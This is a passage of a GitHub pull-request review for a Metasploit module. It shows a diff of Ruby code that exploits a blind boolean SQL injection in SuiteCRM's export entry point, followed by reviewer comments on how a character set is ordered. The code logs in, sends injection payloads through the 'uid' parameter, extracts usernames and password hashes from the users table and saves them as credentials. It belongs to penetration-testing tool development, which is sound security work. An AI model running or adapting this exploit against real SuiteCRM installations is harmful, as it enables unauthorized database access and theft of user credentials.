modules/auxiliary/scanner/http/suite_crm_export_sqli.rb

```diff
@@ -0,0 +1,210 @@
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    return false unless res
+
+    if res.code == 200
+      print_good("Authenticated as: #{datastore['USERNAME']}")
+      @authenticated = true
+      true
+    else
+      print_error("Failed to authenticate as: #{datastore['USERNAME']}")
+      false
+    end
+  end
+
+  def request(uid)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'index.php?entryPoint=export'),
+      'encode_params' => false,
+      'vars_post' => {
+        'uid' => uid,
+        'module' => 'Accounts',
+        'action' => 'index'
+      }
+    })
+    res
+  end
+
+  # @return an array of usernames
+  def get_user_names(sqli)
+    print_status 'Fetching Users, please wait...'
+    users_encoded = sqli.run_sql('select to_base64(group_concat(user_name)) from users')
+    Rex::Text.decode_base64(users_encoded).split(',')
+  end
+
+  # Use blind boolean SQL injection to determine the user_hashes of given usernames
+  def get_user_hashes(sqli, users)
+    print_status 'Fetching Hashes, please wait...'
+    hashes = []
+    users.each do |username|
+      hash = sqli.run_sql("select user_hash from users where user_name='#{username}'")
+      hashes << [username, hash]
+      print_good "(#{users.index(username) + 1}/#{users.size}) Username : #{username} ; Hash : #{hash}"
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: username,
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(hash),
+        private_data: hash,
+        service_name: 'SuiteCRM',
+        address: datastore['RHOSTS'],
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+    end
+    hashes
+  end
+
+  def init_sqli
+    wrong_resp_length = request(',\\,))+AND+1=2;+--+')&.body&.length
+    sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
+      length1 = request(",\\,))+OR+(#{payload});+--+")&.body&.length
+      length1 != wrong_resp_length
+    end
+
+    # redefine blind_detect_length and blind_dump_data because of the bad characters the payload cannot include
+
+    def sqli.blind_detect_length(query, _timebased)
+      output_length = 0
+      loop do
+        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")
+
+        output_length += 1
+      end
+      output_length
+    end
+
+    def sqli.blind_dump_data(query, length, _known_bits, _bits_to_guess, _timebased)
+      charset = 32.upto(126).to_a + 32.times.to_a + 127.upto(255).to_a
```

Comment:
This seems a little crazy since `upto` will also include the number being mentioned. So essentially you are taking a very complicated path to include every number from 0 to 255 inclusive.

Reply:
```suggestion
      charset = 0.upto(255).to_a
```

Suggestion assuming above was your intention

Reply:
The reason I took this path is to improve the running time, I assume most of the characters that we will retrieve won't have ascii codes less than 32 (exceptions are newlines, tabs and the like, but I don't think there will be a lot of them, certainly nothing close to 50% of the data the module dumps). The existing code essentially orders the values in `(0..255)` in a way that's better than `(0..255).to_a`.
256.times is fine also.

Reply:
Hmm okay if that is the case we really should be commenting that into the code as that is pretty important information to explain why we are taking this approach vs simplifying the code. I agree with your approach, just needs to be explained via comments or similar.